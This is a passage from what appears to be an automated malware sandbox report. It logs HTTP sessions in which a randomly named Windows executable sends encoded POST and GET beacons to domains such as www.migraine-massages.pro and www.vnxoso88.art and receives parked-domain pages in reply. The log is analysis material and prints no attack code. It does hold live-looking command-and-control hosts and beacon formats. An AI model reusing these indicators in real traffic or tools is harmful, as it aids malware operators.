                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 14, 2024 15:40:12.583887100 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGRjZTVmNGYtMmJhNC00YTQ2LWE0YTMtMmQ5MzlhMzUyZDExIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49977 | 199.59.243.227 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:14.487375975 CET | 1700 | OUT | POST /ym43/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  Origin: http://www.migraine-massages.pro
                                                                                                                                                  Referer: http://www.migraine-massages.pro/ym43/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 78 4b 39 53 4f 51 34 67 42 53 4f 71 2b 37 34 42 6f 4f 34 7a 53 71 61 42 41 59 4f 39 4c 42 65 52 4f 6d 4d 45 4b 4b 54 6e 4e 5a 4a 30 6d 39 69 68 72 68 53 4a 66 4d 77 50 47 6a 61 73 37 65 65 57 39 49 42 36 37 72 6e 76 67 33 71 4a 39 70 36 2f 47 38 68 67 4a 46 42 5a 79 79 4b 79 58 59 37 72 5a 69 74 75 4d 6b 53 56 52 6c 50 79 46 49 79 43 6c 4c 36 74 77 4e 71 73 4d 54 4d 6c 37 78 6a 6e 4a 56 72 6a 34 39 63 39 34 73 69 6a 45 6d 64 44 65 62 67 46 53 50 45 49 4c 66 73 53 59 4f 56 42 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+elJ5QXwirl/5pMQbraug7Q9UqepvIpkuQQLhBRXSXHlYeYtYR45opue+mluAIbd3Ducn/d9YTscwYzx4Q9dVJLwB84EOdydKzjKHv7SRxcuSs7M+dcQrQ/v2H3xxPjlKb2xK9SOQ4gBSOq+74BoO4zSqaBAYO9LBeROmMEKKTnNZJ0m9ihrhSJfMwPGjas7eeW9IB67rnvg3qJ9p6/G8hgJFBZyyKyXY7rZituMkSVRlPyFIyClL6twNqsMTMl7xjnJVrj49c94sijEmdDebgFSPEILfsSYOVBO3xjfbqvVgqILMV+XdNen1T2RAKwgO61cdKBGTtU6jKl3QmG+QBfkGD4JujR4lTc0z/tuIYBJx+9OFq9JeKqcyyQ4FQGzsVvyUywtcU3v+h1+jVriAlw1EP9YkYcNmC57f/7TmAYd1wIQngAXcZCI/f8fVxjRUZbYHr+iSZqeEjdXfxTrekmDWF8YywgnizENOK3yPs28GzJsz+LeRAuy/UeWHyGyoS0/ImzePlHWYDTVEGoBp4H3RW4w5AHzRClooNsFXPT6YVAYmAxyEX21RQ5L7WKm+9HHcbZgt1LZySYucOYQrXU5XYsS7ZudoazCYeEa9ikEOPIEgf++dUfPNBz6Y4fwxfmTVu1BJNXNj9/OthTFGsLfbAErSC5WcGd6c5oYbL6beXeMGWqoWbjtLvu73dT4K01LSGKzYzu/TnxFJN9PYoqizJkUdMUc/Kk0NZWrDis7MD3Ix65ZGAfVBzdHGGipJ6rJm+FSk6j3jMlwrJAaOEQ3E0gf9co0ibN8BCo6bMbOvgr6Ol28zRZBteIyvNrdyUZuxsEbaBPsISxh5Zu2fG27Z5WzsYElmsZoLHwkGc7IFzzT4lVToRysj/jnXmMWdSASwCHD2CNGYPFa3k9pfU3i5hreXwcoBcWFv2+vGYViAHgKfJLSM6Nb/CBi/CB/rpRC1 [TRUNCATED]
Nov 14, 2024 15:40:15.134236097 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:14 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1154
                                                                                                                                                  x-request-id: eb79255e-47ff-4722-be6b-158a4ef7316c
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                                                                                  set-cookie: parking_session=eb79255e-47ff-4722-be6b-158a4ef7316c; expires=Thu, 14 Nov 2024 14:55:15 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 14, 2024 15:40:15.134362936 CET | 607 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWI3OTI1NWUtNDdmZi00NzIyLWJlNmItMTU4YTRlZjczMTZjIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49986 | 199.59.243.227 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:17.088653088 CET | 390 | OUT | GET /ym43/?W638b4U=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRTsdeZatTq9P8nD3DJaYsKbhsyMI+cP4BIi4vfpBrFLN6oA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.migraine-massages.pro
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:40:17.707554102 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:16 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1518
                                                                                                                                                  x-request-id: 80f4ccc1-0ec1-469b-a4ea-b95c5083a771
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hWSW/6myXdAG/dDIsV50Lsy88i4smYJL1sTsm8rM+OGq0dyjg4+2vcZGTg+243wkPTg6NkypZhQn9T0cRTp3Dg==
                                                                                                                                                  set-cookie: parking_session=80f4ccc1-0ec1-469b-a4ea-b95c5083a771; expires=Thu, 14 Nov 2024 14:55:17 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 57 53 57 2f 36 6d 79 58 64 41 47 2f 64 44 49 73 56 35 30 4c 73 79 38 38 69 34 73 6d 59 4a 4c 31 73 54 73 6d 38 72 4d 2b 4f 47 71 30 64 79 6a 67 34 2b 32 76 63 5a 47 54 67 2b 32 34 33 77 6b 50 54 67 36 4e 6b 79 70 5a 68 51 6e 39 54 30 63 52 54 70 33 44 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hWSW/6myXdAG/dDIsV50Lsy88i4smYJL1sTsm8rM+OGq0dyjg4+2vcZGTg+243wkPTg6NkypZhQn9T0cRTp3Dg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 14, 2024 15:40:17.707871914 CET | 971 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODBmNGNjYzEtMGVjMS00NjliLWE0ZWEtYjk1YzUwODNhNzcxIiwicGFnZV90aW1lIjoxNzMxNTk1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49987 | 199.59.243.227 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:23.102281094 CET | 636 | OUT | POST /d26j/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vnxoso88.art
                                                                                                                                                  Origin: http://www.vnxoso88.art
                                                                                                                                                  Referer: http://www.vnxoso88.art/d26j/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 47 53 2b 78 4f 46 4f 56 32 44 64 46 58 6c 41 39 30 6a 73 69 55 54 4e 56 55 6a 62 57 77 36 6c 33 42 66 55 50 4d 75 54 56 66 62 6d 77 48 58 59 2f 32 62 71 45 5a 68 59 56 4b 2f 4e 47 6f 51 34 68 4a 6b 64 79 39 64 74 6b 32 57 31 32 4d 78 5a 32 49 33 39 4f 2f 37 45 70 4e 6a 68 63 57 68 52 55 59 70 68 6d 58 5a 52 33 45 68 64 73 45 6e 72 6d 63 6e 55 55 61 38 6b 6a 67 76 71 50 73 52 74 4f 62 52 61 53 39 72 42 48 36 55 37 77 6c 68 45 54 74 57 71 4c 32 64 68 61 55 6b 7a 4e 4e 62 77 55 65 37 30 5a 48 5a 63 54 39 53 57 72 31 78 4e 34 6a 54 33 4f 39 75 2b 39 6f 54 45 3d
                                                                                                                                                  Data Ascii: W638b4U=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZhYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPsRtObRaS9rBH6U7wlhETtWqL2dhaUkzNNbwUe70ZHZcT9SWr1xN4jT3O9u+9oTE=
Nov 14, 2024 15:40:24.058964014 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:23 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1118
                                                                                                                                                  x-request-id: 8e83974e-b816-4a62-bf5d-bbf3ad283854
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                                                                                                  set-cookie: parking_session=8e83974e-b816-4a62-bf5d-bbf3ad283854; expires=Thu, 14 Nov 2024 14:55:23 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 14, 2024 15:40:24.058990002 CET | 571 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGU4Mzk3NGUtYjgxNi00YTYyLWJmNWQtYmJmM2FkMjgzODU0IiwicGFnZV90aW1lIjoxNzMxNTk1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49988 | 199.59.243.227 | 80 | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:40:25.811752081 CET | 656 | OUT | POST /d26j/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.vnxoso88.art
                                                                                                                                                  Origin: http://www.vnxoso88.art
                                                                                                                                                  Referer: http://www.vnxoso88.art/d26j/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 52 33 42 36 77 50 4e 76 54 56 65 62 6d 77 4d 33 5a 31 79 62 71 4e 5a 68 55 6e 4b 39 5a 47 6f 51 73 68 4a 6d 31 79 39 75 56 6e 30 47 31 77 5a 42 5a 30 56 6e 39 4f 2f 37 45 70 4e 6a 45 35 57 68 5a 55 62 5a 78 6d 52 49 52 32 59 52 64 76 54 58 72 6d 59 6e 55 51 61 38 6b 56 67 75 32 70 73 53 5a 4f 62 56 65 53 39 2b 31 41 30 55 37 32 34 78 46 79 6f 7a 54 63 33 73 39 6a 49 48 79 34 53 39 6f 56 66 4e 46 7a 64 37 55 37 75 79 36 54 6c 69 46 50 79 6a 57 6e 6e 4e 75 4e 32 45 51 58 37 6a 46 6d 68 51 69 43 69 59 57 4d 55 7a 33 68 7a 38 41 77
                                                                                                                                                  Data Ascii: W638b4U=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqNZhUnK9ZGoQshJm1y9uVn0G1wZBZ0Vn9O/7EpNjE5WhZUbZxmRIR2YRdvTXrmYnUQa8kVgu2psSZObVeS9+1A0U724xFyozTc3s9jIHy4S9oVfNFzd7U7uy6TliFPyjWnnNuN2EQX7jFmhQiCiYWMUz3hz8Aw
Nov 14, 2024 15:40:26.467685938 CET | 1236 bytes | IN | HTTP/1.1 200 OK
                                                                                                                                                  date: Thu, 14 Nov 2024 14:40:26 GMT
                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                  content-length: 1118
                                                                                                                                                  x-request-id: 91c41352-1e5d-479e-9443-bf752271e6b6
                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                                                                                                  set-cookie: parking_session=91c41352-1e5d-479e-9443-bf752271e6b6; expires=Thu, 14 Nov 2024 14:55:26 GMT; path=/
                                                                                                                                                  connection: close
                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 77 36 4a 66 6f 4e 4d 5a 55 43 6d 42 41 61 57 4f 33 59 51 62 39 58 66 33 72 75 6b 45 32 2b 56 70 56 72 41 4e 6c 39 30 47 38 41 47 77 2f 78 4c 55 4f 58 52 4e 61 4b 4f 39 63 77 65 6b 36 6b 70 6c 77 4d 4a 35 74 4b 74 72 54 77 4b 73 2b 70 31 71 51 47 42 72 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
